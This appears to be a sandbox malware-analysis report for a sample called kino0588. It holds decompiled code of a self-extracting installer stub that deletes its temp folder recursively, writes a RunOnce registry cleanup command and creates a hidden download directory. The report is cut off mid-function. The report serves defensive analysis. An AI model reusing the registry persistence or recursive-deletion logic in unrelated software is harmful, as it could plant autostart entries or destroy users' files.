• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00192FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00192FC6
• DecryptFileA.ADVAPI32 ref: 00192FE6
• FreeLibrary.KERNEL32(00000000), ref: 00192FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019301C
  • Part of subcall function 001951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00192F4D,?,00000002,00000000), ref: 00195201
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2126469477-3395714304
                                                                                                                                                                                                                                    • Opcode ID: 080184617404c384505e176499dc08e07a186de8eb62cb83c8f5831a200e595d
                                                                                                                                                                                                                                    • Instruction ID: 8fd74bd6f42d5cb74ca2a443191c506baeaecc77e65ac915a8d53ccb9d0519ff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 080184617404c384505e176499dc08e07a186de8eb62cb83c8f5831a200e595d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2641C231A002059BDF30AB75AC49A6A33B8EB65B50F08016BF951C3991EF74CEC4CAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 86%
/* Decompiled by the Joe Sandbox IDA plugin (quality 86%). Behaviour visible in
   the code: given a directory path in ecx, enumerate its entries with
   FindFirstFileA/FindNextFileA, clear attributes (0x80 = FILE_ATTRIBUTE_NORMAL)
   and DeleteFileA each file, recurse into subdirectories other than "." and
   "..", then FindClose and RemoveDirectoryA the directory itself, i.e. a
   recursive directory wipe (here applied to the IXP003.TMP working directory).
   Helper names (E00191680, E001916B3, E0019658A, E00196CE0) are decompiler
   labels, not resolved symbols. */
E00192390(CHAR* __ecx) {
    signed int _v8;
    char _v276;
    char _v280;
    char _v284;
    struct _WIN32_FIND_DATAA _v596;
    struct _WIN32_FIND_DATAA _v604;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t21;
    int _t36;
    void* _t46;
    void* _t62;
    void* _t63;
    CHAR* _t65;
    void* _t66;
    signed int _t67;
    signed int _t69;

    _t69 = (_t67 & 0xfffffff8) - 0x254;
    _t21 =  *0x198004; // 0x21bd9a3c (stack cookie seed)
    _t22 = _t21 ^ _t69;
    _v8 = _t21 ^ _t69;
    _t65 = __ecx;
    if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
        L10:
        _pop(_t62);
        _pop(_t66);
        _pop(_t46);
        return E00196CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66); // stack cookie check and return
    } else {
        E00191680( &_v276, 0x104, __ecx);          // copy directory path into local buffer
        _t58 = 0x104;
        E001916B3( &_v280, 0x104, "*");            // append "*" search pattern
        _t22 = FindFirstFileA( &_v284,  &_v604); // executed
        _t63 = _t22;
        if(_t63 == 0xffffffff) {                   // INVALID_HANDLE_VALUE
            goto L10;
        } else {
            goto L3;
        }
        do {
            L3:
            _t58 = 0x104;
            E00191680( &_v276, 0x104, _t65);       // rebuild base path for this entry
            if((_v604.ftCreationTime & 0x00000010) == 0) { // 0x10 = FILE_ATTRIBUTE_DIRECTORY
                _t58 = 0x104;
                E001916B3( &_v276, 0x104,  &(_v596.dwReserved1)); // append file name
                SetFileAttributesA( &_v280, 0x80);  // FILE_ATTRIBUTE_NORMAL, clears read-only
                DeleteFileA( &_v280);
            } else {
                if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                    E001916B3( &_v276, 0x104,  &(_v596.cFileName)); // append subdirectory name
                    _t58 = 0x104;
                    E0019658A( &_v280, 0x104, 0x191140);            // append path separator string
                    E00192390( &_v284);                             // recurse into subdirectory
                }
            }
            _t36 = FindNextFileA(_t63,  &_v596); // executed
        } while (_t36 != 0);
        FindClose(_t63); // executed
        _t22 = RemoveDirectoryA(_t65); // executed
        goto L10;
    }
}

APIs
• FindFirstFileA.KERNELBASE(?,00198A3A,001911F4,00198A3A,00000000,?,?), ref: 001923F6
• lstrcmpA.KERNEL32(?,001911F8), ref: 00192427
• lstrcmpA.KERNEL32(?,001911FC), ref: 0019243B
• SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00192495
• DeleteFileA.KERNEL32(?), ref: 001924A3
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 001924AF
• FindClose.KERNELBASE(00000000), ref: 001924BE
• RemoveDirectoryA.KERNELBASE(00198A3A), ref: 001924C5
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0
• Opcode ID: 4734a7170b2c0e7e4a84cb80b76ba2e06753e2f09a0ad4141cf9ed68722d52bb
• Instruction ID: 762b827e17ceb7d725b00e4e21c17ab7daddea068e358a6acaac49b7f71988bb
• Opcode Fuzzy Hash: 4734a7170b2c0e7e4a84cb80b76ba2e06753e2f09a0ad4141cf9ed68722d52bb
• Instruction Fuzzy Hash: F031A131604741BBCB20EB64CC89AEB73ECAFD4305F44492EF55583290EB74998DC792
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E00192BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	long _t4;
	void* _t6;
	intOrPtr _t7;
	void* _t9;
	struct HINSTANCE__* _t12;
	intOrPtr* _t17;
	signed char _t19;
	intOrPtr* _t21;
	void* _t22;
	void* _t24;
	intOrPtr _t32;

	_t4 = GetVersion();
	if(_t4 >= 0 && _t4 >= 6) {
		_t12 = GetModuleHandleW(L"Kernel32.dll");
		if(_t12 != 0) {
			_t21 = GetProcAddress(_t12, "HeapSetInformation");
			if(_t21 != 0) {
				_t17 = _t21;
				 *0x19a288(0, 1, 0, 0);
				 *_t21();
				_t29 = _t24 - _t24;
				if(_t24 != _t24) {
					_t17 = 4;
					asm("int 0x29");
				}
			}
		}
	}
	_t20 = _a12;
	_t18 = _a4;
	 *0x199124 = 0;
	if(E00192CAA(_a4, _a12, _t29, _t17) != 0) {
		_t9 = E00192F1D(_t18, _t20); // executed
		_t22 = _t9; // executed
		E001952B6(0, _t18, _t21, _t22); // executed
		if(_t22 != 0) {
			_t32 =  *0x198a3a; // 0x0
			if(_t32 == 0) {
				_t19 =  *0x199a2c; // 0x0
				if((_t19 & 0x00000001) != 0) {
					E00191F90(_t19, _t21, _t22);
				}
			}
		}
	}
	_t6 =  *0x198588; // 0x0
	if(_t6 != 0) {
		CloseHandle(_t6);
	}
	_t7 =  *0x199124; // 0x0
	return _t7;
}

Instruction address column for the C-code listing above (one address per decompiled line): 0x00192c03, 0x00192c0d, 0x00192c18, 0x00192c20, 0x00192c2e, 0x00192c32, 0x00192c36, 0x00192c3d, 0x00192c43, 0x00192c45, 0x00192c47, 0x00192c49, 0x00192c4e, 0x00192c4e, 0x00192c47, 0x00192c32, 0x00192c20, 0x00192c50, 0x00192c54, 0x00192c57, 0x00192c64, 0x00192c66, 0x00192c6b, 0x00192c6d, 0x00192c74, 0x00192c76, 0x00192c7c, 0x00192c7e, 0x00192c87, 0x00192c89, 0x00192c89, 0x00192c87, 0x00192c7c, 0x00192c74, 0x00192c8e, 0x00192c95, 0x00192c98, 0x00192c98, 0x00192c9e, 0x00192ca7

APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,00196BB0,00190000,00000000,00000002,0000000A), ref: 00192C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,00196BB0,00190000,00000000,00000002,0000000A), ref: 00192C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00192C28
• CloseHandle.KERNEL32(00000000,?,?,00196BB0,00190000,00000000,00000002,0000000A), ref: 00192C98
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: 69ee6ef951b60519b29d5574f468655b35223bcfb8ffb9344f25765c1e1a7adb
• Instruction ID: 1fbc81ca713be236751e3ade9d45563e4fd3c4ecff575d1cdfb24e2fc0d15b7a
• Opcode Fuzzy Hash: 69ee6ef951b60519b29d5574f468655b35223bcfb8ffb9344f25765c1e1a7adb
• Instruction Fuzzy Hash: 931108712013067BDF207BB8BC89E6F3769AF897A0B080027F900D3651DB71DC85C6A6
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00196F40() {

	SetUnhandledExceptionFilter(E00196EF0); // executed
	return 0;
}



Instruction addresses: 0x00196f45 0x00196f4d

APIs
• SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00196F45
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 52fa47d88df07cd76e47448b712f458c23ac0973fbf864fcd524dce1e556dd5a
• Instruction ID: e3e2e4a90d6d736d55712378edfd85d9f12dd5d6c80486405b7d126416ce7976
• Opcode Fuzzy Hash: 52fa47d88df07cd76e47448b712f458c23ac0973fbf864fcd524dce1e556dd5a
• Instruction Fuzzy Hash: 4B90026425110047DA105B709D1941579915F4D642BC15471A011C4894DB6044845562
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 93%
E0019202A(struct HINSTANCE__* __edx) {
	signed int _v8;
	char _v268;
	char _v528;
	void* _v532;
	int _v536;
	int _v540;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t28;
	long _t36;
	long _t41;
	struct HINSTANCE__* _t46;
	intOrPtr _t49;
	intOrPtr _t50;
	CHAR* _t54;
	void _t56;
	signed int _t66;
	intOrPtr* _t72;
	void* _t73;
	void* _t75;
	void* _t80;
	intOrPtr* _t81;
	void* _t86;
	void* _t87;
	void* _t90;
	_Unknown_base(*)()* _t91;
	signed int _t93;
	void* _t94;
	void* _t95;

	_t79 = __edx;
	_t28 =  *0x198004; // 0x21bd9a3c
	_v8 = _t28 ^ _t93;
	_t84 = 0x104;
	memset( &_v268, 0, 0x104);
	memset( &_v528, 0, 0x104);
	_t95 = _t94 + 0x18;
	_t66 = 0;
	_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
	if(_t36 != 0) {
		L24:
		return E00196CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
	}
	_push(_t86);
	_t87 = 0;
	while(1) {
		E0019171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
		_t95 = _t95 + 0x10;
		_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
		if(_t41 != 0) {
			break;
		}
		_t87 = _t87 + 1;
		if(_t87 < 0xc8) {
			continue;
		}
		break;
	}
	if(_t87 != 0xc8) {
		GetSystemDirectoryA( &_v528, _t84);
		_t79 = _t84;
		E0019658A( &_v528, _t84, "advpack.dll");
		_t46 = LoadLibraryA( &_v528); // executed
		_t84 = _t46;
		if(_t84 == 0) {
			L10:
			if(GetModuleFileNameA( *0x199a3c,  &_v268, 0x104) == 0) {
				L17:
				_t36 = RegCloseKey(_v532);
				L23:
				_pop(_t86);
				goto L24;
			}
                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                    						_t72 =  &_v268;
                                                                                                                                                                                                                                    						_t80 = _t72 + 1;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t49 =  *_t72;
                                                                                                                                                                                                                                    							_t72 = _t72 + 1;
                                                                                                                                                                                                                                    						} while (_t49 != 0);
                                                                                                                                                                                                                                    						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                    						_t81 = 0x1991e4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t50 =  *_t81;
                                                                                                                                                                                                                                    							_t81 = _t81 + 1;
                                                                                                                                                                                                                                    						} while (_t50 != 0);
                                                                                                                                                                                                                                    						_t84 = _t73 + 0x50 + _t81 - 0x1991e5;
                                                                                                                                                                                                                                    						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1991e5);
                                                                                                                                                                                                                                    						if(_t90 != 0) {
                                                                                                                                                                                                                                    							 *0x198580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                    							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                                                    								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                    							E0019171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                    							_t75 = _t90;
                                                                                                                                                                                                                                    							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                    							_t79 = _t23;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t56 =  *_t75;
                                                                                                                                                                                                                                    								_t75 = _t75 + 1;
                                                                                                                                                                                                                                    							} while (_t56 != 0);
                                                                                                                                                                                                                                    							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                    							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                    							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                    							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t79 = 0x4b5;
                                                                                                                                                                                                                                    						E001944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                    						E0019658A( &_v268, 0x104, 0x191140);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                    				 *0x198530 = _t66;
                                                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                                                    			}
Statement addresses for the block above (decompiler address column): 0x0019202a through 0x00192266.
                                                                                                                                                                                                                                    0x00192250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192250
                                                                                                                                                                                                                                    0x001921d2
                                                                                                                                                                                                                                    0x001921d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001921d9
                                                                                                                                                                                                                                    0x0019213a
                                                                                                                                                                                                                                    0x00192141
                                                                                                                                                                                                                                    0x00192144
                                                                                                                                                                                                                                    0x0019214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192163
                                                                                                                                                                                                                                    0x00192172
                                                                                                                                                                                                                                    0x00192172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192163
                                                                                                                                                                                                                                    0x001920ea
                                                                                                                                                                                                                                    0x001920f0
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00192050
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0019205F
                                                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0019208C
                                                                                                                                                                                                                                      • Part of subcall function 0019171E: _vsnprintf.MSVCRT ref: 00191750
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001920C9
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001920EA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00192103
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192122
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00192134
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192144
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0019215B
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0019218C
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001921C1
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001921E4
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0019223D
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192249
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192250
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                                                    • API String ID: 178549006-1281856606
                                                                                                                                                                                                                                    • Opcode ID: 333c9a74b689428de139219dcd64de69395d86c8935b660745e4a20f5c787346
                                                                                                                                                                                                                                    • Instruction ID: 226d52c378f8e4f868f08772797392981e382c7f6b36e5acf0d349f58dc9ed01
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 333c9a74b689428de139219dcd64de69395d86c8935b660745e4a20f5c787346
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D51E571A00214BBDF249B64DC49FFB7B6CEF55700F0401AAFA49E7191DB719D898AA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E001955A0(void* __eflags) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                                                    				void* _t103;
				signed int _t110;

				_t28 =  *0x198004; // 0x21bd9a3c
				_v8 = _t28 ^ _t110;
				_t2 = E0019468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0019468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x199a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x198b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x198a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00196517(_t82, 0x7d2, 0, E00193210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x199a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x1991e4;
									_t40 = GetTempPathA(0x104, 0x1991e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00191781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00196952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0019597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00192630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0019658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x1991e4;
																					E00191781(0x1991e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00195467(0x1991e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00192630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0019597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                    																			goto L28;
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														goto L22;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L47;
                                                                                                                                                                                                                                    												L42:
                                                                                                                                                                                                                                    												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                    											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t101 = 1;
                                                                                                                                                                                                                                    										_t69 = E00195467(0x1991e4, 1, 3); // executed
                                                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                                                    										if(_t69 != 0) {
                                                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t82 = 0x1991e4;
                                                                                                                                                                                                                                    											_t70 = E00192630(0, 0x1991e4, 1);
                                                                                                                                                                                                                                    											__eflags = _t70;
                                                                                                                                                                                                                                    											if(_t70 != 0) {
                                                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t101 = 1;
                                                                                                                                                                                                                                    												_t82 = 0x1991e4;
                                                                                                                                                                                                                                    												_t71 = E00195467(0x1991e4, 1, 1);
                                                                                                                                                                                                                                    												__eflags = _t71;
                                                                                                                                                                                                                                    												if(_t71 != 0) {
                                                                                                                                                                                                                                    													goto L45;
                                                                                                                                                                                                                                    												} else {
